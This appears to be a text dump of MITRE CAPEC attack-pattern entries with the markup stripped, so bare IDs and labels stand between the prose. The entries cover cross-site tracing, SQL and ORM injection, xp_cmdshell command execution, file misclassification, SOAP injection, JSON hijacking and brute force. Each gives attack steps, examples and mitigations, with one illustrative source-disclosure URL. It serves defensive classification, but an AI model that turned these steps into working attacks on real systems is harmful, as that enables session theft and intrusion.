The attacker attempts to force the victim to issue an HTTP Trace request to the targeted application.
The attacker probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request.
env-Web
Attacker's script is executed within the browser context.
Create a malicious script that pings the web server with HTTP TRACE request
Create a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the attacker.
The attacker's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response.
env-Web
Execute malicious HTTP Trace launching script
The attacker leverages a vulnerability to force the victim to execute the malicious HTTP Trace launching script
HTTP TRACE is enabled on the web server
The destination system is susceptible to XSS or an attacker can leverage some other weakness to bypass the same origin policy
Scripting is enabled in the client's browser
HTTP is used as the communication protocol between the server and the client
Very High
Medium
Protocol Manipulation
Injection
An attacker determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An attacker realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with his malicious script. Instead, the attacker has his script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The attacker picks the session cookie from the body of HTTP TRACE response and ships it to the attacker. The attacker then uses the newly acquired victim's session cookie to impersonate the victim in the target system.
Medium
Understanding of the HTTP protocol and an ability to craft a malicious script
No specialized resources are needed
Send HTTP TRACE requests to the destination web server to see if it responds
Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default.
Patch web browser against known security origin policy bypass exploits.
Confidentiality
Read memory
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
693
Targeted
648
Targeted
1000
Attack Pattern
ChildOf
86
Turn off HTTP TRACE on the web server (if not needed)
Complete Mediation
Secure by Default
Exploitation
High
High
Medium
Client-Server
All
All
All
Jeremiah Grossman
Cross-Site Tracing (XST)
WhiteHat Security
2003
http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
Probe for SQL Injection vulnerability
The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query.
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives an error message from server indicating that there was a problem with the SQL query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
At least one user-controllable input susceptible to injection found.
No user-controllable input susceptible to injection found.
Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.).
Input validation of user-controlled data before including it in a SQL query
Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET)
Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive
The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive.
Attacker's injected code is executed.
Disable xp_cmdshell stored procedure on the database.
Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.).
Input validation of user-controlled data before including it in a SQL query
Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET)
Inject malicious data in the database
Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument
Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.).
Input validation of user-controlled data before including it in a SQL query
Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET)
Trigger command line execution with injected arguments
The attacker causes execution of command line functionality which leverages previously injected database content as arguments.
Attacker's injected code is executed.
The application does not properly validate data before storing in the database
Backend application implicitly trusts the data stored in the database
Malicious data is used on the backend as a command line argument
Very High
Low
Analysis
Injection
SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).
Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6799
High
The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding.
No specialized resources are required
Disable MSSQL xp_cmdshell directive on the database
Properly validate the data (syntactically and semantically) before writing it to the database.
Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument).
Integrity
Modify application data
Confidentiality
Read memory
Read application data
Availability
DoS: crash / exit / restart
DoS: instability
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
89
Targeted
74
Secondary
20
Secondary
78
Targeted
114
Targeted
1000
Attack Pattern
ChildOf
66
Validate all data syntactically and semantically before writing it to the database
Do not implicitly trust database data and validate it to ensure that it is safe in the context in which it is being used
Defense in Depth
Least Privilege
Exploitation
High
High
High
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.
Determine Persistence Framework Used
An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.
An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there.
env-Web
Probe for ORM Injection vulnerabilities
The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content.
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives an error message from server indicating that there was a problem with the data query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Perform SQL Injection through the generated data access layer
An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.
An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application.
env-Web
Attacker achieves goal of unauthorized system access, denial of service, etc.
Attacker unable to exploit SQL Injection vulnerability.
An application uses data access layer generated by an ORM tool or framework
An application uses user supplied data in queries executed against the database
The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework
High
Low
Injection
Analysis
API Abuse
When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer.
Medium
Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed
No specialized resources are required.
Provide various input to the system in an attempt to induce an error that would reveal stack trace information about the ORM layer (if any) used
Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework
Ensure to keep up to date with security relevant updates to the persistence framework used within your application.
Integrity
Modify application data
Availability
DoS: crash / exit / restart
DoS: instability
Confidentiality
Read memory
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
20
Targeted
100
Targeted
89
Targeted
564
Targeted
1000
Attack Pattern
ChildOf
66
Ensure that the ORM data access methods that are used by the application leverage parameter binding
Defense in Depth
Keep it Simple
Compartmentalization
Exploitation
High
High
High
Client-Server
All
All
All
OWASP Testing Guide
Testing for ORM Injection (OWASP-DV-007)
v4 [DRAFT]
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_ORM_Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process.
This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.
Footprint file input vectors
Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.
Attacker manually crawls application to identify file inputs
env-Web
Attacker uses an automated tool to crawl application identify file inputs
env-Web
Attacker manually assesses strength of access control protecting native application files from user control
env-Web
Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests
env-Web
Application submits files under user control to the web server
env-Web
Application does not submit files under user control to the web server
env-Web
Application strictly protects all native application files from user control
env-Web
User-controllable files are identified
File misclassification shotgunning
An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.
Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.
env-Web
Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server.
env-Web
The web server uses the wrong handler to execute the file, as expected by the attacker.
env-Web
No result from the web server.
env-Web
The web server ignore the manipulation and process the request has it should have been.
env-Web
Web server exhibits unexpected behavior.
Monitor web server logs for excessive file processing errors
Always validate that file content structure matches implicitly or explicitly declared file type as first step of processing.
File misclassification sniping
Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.
Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.
env-Web
Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server.
env-Web
The web server uses the wrong handler to execute the file, as expected by the attacker.
env-Web
No result from the web server.
env-Web
The web server ignore the manipulation and process the request has it should have been.
env-Web
Attacker's payload is acted on by web server.
The attacker cannot get the web server to misclassify a file.
Monitor web server logs for excessive file processing errors
Always validate that file content structure matches implicitly or explicitly declared file type as first step of processing.
Disclose information
The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).
Manipulate the file names that are explicitly sent to the server.
env-Web
Manipulate the MIME sent in order to confuse the web server.
env-Web
The attacker gets the information from the server
Always validate that file content structure matches implicitly or explicitly declared file type as first step of processing.
Web server software must rely on file name or file extension for processing.
High
Medium
Injection
Modification of Resources
J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.
http://victim.site/login.jsp.
Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.
[R.11.2]
Low
To modify file name or file extension
Medium
To use misclassification to force the Web server to disclose configuration information, source, or binary data
Ability to execute HTTP request to Web server
Implementation: Server routines should be determined by content not determined by filename or file extension.
Confidentiality
Read memory
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Malicious input delivered through standard Web application calls, e.g. HTTP Request.
Varies with instantiation of attack pattern. Malicious payload may alter or append filename or extension to communicate with processes in unexpected order.
Client machine and client network
Enables attacker to force web server to disclose configuration, source, and data
69
Secondary
77
Secondary
1000
Attack Pattern
ChildOf
165
1000
Attack Pattern
ChildOf
266
Reconnaissance
High
Low
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204)
SecurityFocus
Mar 23 2006
http://www.securityfocus.com/bid/17204/info
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.
Detect Incorrect SOAP Parameter Handling
The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.
The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior.
env-Web
SOAP messages are used as a communication mechanism in the system
env-Web
Any indication that the injected input is causing system trouble (e.g. stack traces are produced, the system does not respond, etc.) then the attacker may come to conclude that the system is vulnerable to SQL injection through SOAP parameter tampering.
Probe for SQL Injection vulnerability
The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query.
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives an error message from server indicating that there was a problem with the SQL query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
At least one SOAP parameter susceptible to injection found.
No SOAP parameter susceptible to injection found.
Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.).
Input validation of SOAP parameter data before including it in a SQL query
Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET)
Inject SQL via SOAP Parameters
The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.
An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider.
env-Web
Attacker achieves goal of unauthorized system access, denial of service, etc.
Attacker unable to exploit SQL Injection vulnerability.
SOAP messages are used as a communication mechanism in the system
SOAP parameters are not properly validated at the service provider
The service provider does not properly utilize parameter binding when building SQL queries
Very High
High
Injection
Analysis
An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. He notices that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies his payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure.
Medium
If the attacker is able to gain good understanding of the system's database schema
High
If the attacker has to perform SQL injection blindly
No specialized hardware resources are required
Inject SQL characters in SOAP parameters and observe system behavior
Review WSDL to understand what is expected by the service provider
Properly validate and sanitize/reject user input at the service provider.
Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.
At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly.
Integrity
Modify application data
Availability
Unexpected State
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
89
Targeted
20
Secondary
1000
Attack Pattern
ChildOf
66
1000
Attack Pattern
CanFollow
280
Always safely access the database through prepared statements that leverage parameter binding
Properly validate all SOAP parameters to ensure that their values are as expected
Reject bad user input (do not try to sanitize it)
Defense in Depth
Least Privilege
Remember that the client can be made invisible
Exploitation
High
High
High
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.
An attacker gets the victim to visit his or her malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server.
There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.
Understand How to Request JSON Responses from the Target System
An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.
An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit.
env-Web
Targeted application leverages JSON in its architecture.
env-Web
Craft a malicious website
The attacker crafts a malicious website to which he plans to lure the victim who is using the vulnerable target system. The malicious website does two things:
1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).
2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker.
This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain.
The JSON object hook captures, reads and forwards JSON objects
The malicious website effectively requests JSON objects from the target system
Launch JSON hijack
An attacker lures the victim to the malicious website or leverages other means to get his malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in.
An attacker employs a myriad of standard techniques to get the victim to visit his or her malicious site or by some other means get the attackers' malicious code executing in the victim's browser.
env-Web
The sensitive contents of captured JSON objects are readable by the attacker.
JSON is used as a transport mechanism between the client and the server
The target server cannot differentiate real requests from forged requests
The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag
High
High
Protocol Manipulation
Analysis
Spoofing
Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when he or she receives it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.
When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.
Medium
Once this attack pattern is developed and understood, creating an exploit is not very complex.
No specialized hardware resources are required. The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects.
Examine the typical asynchronous requests and responses between an AJAX client and the server to see how JSON objects are requested and what is returned.
Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.
On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).
Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.
Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.
Confidentiality
Read application data
345
Targeted
346
Targeted
352
Targeted
1000
Attack Pattern
ChildOf
116
Ensure that a mechanism is in place for the server side code to differentiate between legitimate requests and forged requests
On the client side, ensure that the returned JavaScript from the server can only be evaluated locally after being assigned to a variable and not via a script tag
Ensure that URLs used to request server responses that pass the JSON objects back to the client are hard to guess and are unique per user session
Do not pass confidential information in JSON objects
Exploitation
High
Low
Low
Client-Server
All
All
AJAX
CAPEC Content Team
The MITRE Corporation
2014-06-23
In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset. Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions.
The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. While the defender cannot control the resources available to an attacker, they can control the size of the secret space. Creating a large secret space involves selecting one's secret from as large a field of equally likely alternative secrets as possible and ensuring that an attacker is unable to reduce the size of this field using available clues or cryptanalysis. Doing this is more difficult than it sounds since elimination of patterns (which, in turn, would provide an attacker clues that would help them reduce the space of potential secrets) is difficult to do using deterministic machines, such as computers. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information. For example, a secret space that will likely take hundreds of years to explore is likely safe from raw-brute force attacks.
Determine secret testing procedure
Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.
Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded.
env-All
Reduce search space
Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.
If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)
env-All
If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.
env-All
If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.
env-All
Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret.
env-All
Expand victory conditions
It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value.
Gather information so attack can be performed independently.
If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords).
The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct.
High
Brute Force
Low
The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located.
Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures.
Repeated submissions of incorrect secret values may indicate a brute force attack. For example, repeated bad passwords when accessing user accounts or repeated queries to databases using non-existent keys.
Attempts to download files protected by secrets (usually using encryption) may be a precursor to an offline attack to break the file's encryption and read its contents. This is especially significant if the file itself contains other secret values, such as password files.
If the attacker is able to perform the checking offline then there will likely be no indication that an attack is ongoing.
The attack is impossible to detect if the attacker can test for successful discovery of the secret value independently, without needing to consult an external authority.
If an external authority must be consulted, the attacker can attempt to space out their guesses to avoid a large number of failed guesses in a short period of time, but doing so slows the attack to the point of making it unworkable against all but the most trivial secret spaces. As such, if an external authority must be consulted the attacked is unlikely to be able to keep the attack secret.
Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.
Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
330
Secondary
326
Secondary
521
Secondary
1000
Category
ChildOf
223
333
Category
HasMember
344
Protect sensitive data, even when the data is encrypted. If an attacker can gain access to encrypted data, they can mount a brute-force attack independently. The defender will not be aware of this attack or be able to do anything about it and at that point it is purely a function of the attackers' available resources as to how long it takes them to learn the secret.
Monitor activity logs for suspicious activity. An attacker that must use an external authority to check their brute-force guesses is easy to detect, but only if that external authority is monitoring activity and detects the abnormally large number of failed guesses.
Do not assume secrets will protect sensitive data in the long-term
Monitor systems for suspicious activity.
Penetration
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates the processing of Application Programming Interface (API) resulting in the API's function having an adverse impact upon the security of the system or application implementing the API. This can allow the attacker to execute functionality not intended by the API implementation, possibly compromising the system or application which integrates the API. API Abuse can take on a number of forms. For example, the API may trust that the calling function properly validates its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution. Another example could be API methods that should be disabled in a production application but were not, thus exposing dangerous functionality within a production environment.
The target system must expose API functionality in a manner that can be discovered and manipulated by an attacker. This may require reverse engineering the API syntax or decrypting/de-obfuscating client-server exchanges.
Medium
The requirements vary depending upon the nature of the API. For application-layer APIs related to the processing of the HTTP protocol, one or more of the following may be needed: a MITM (Man-In-The-Middle) proxy, a web browser, or a programming/scripting language.
676
Targeted
1000
Category
ChildOf
210
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns.
An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way.
Medium
A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism.
287
Targeted
1000
Category
ChildOf
225
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.
An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc.
Medium
A client application, such as a web browser, or a scripting language capable of interacting with the target.
592
Targeted
1000
Category
ChildOf
225
CAPEC Content Team
The MITRE Corporation
2014-06-23
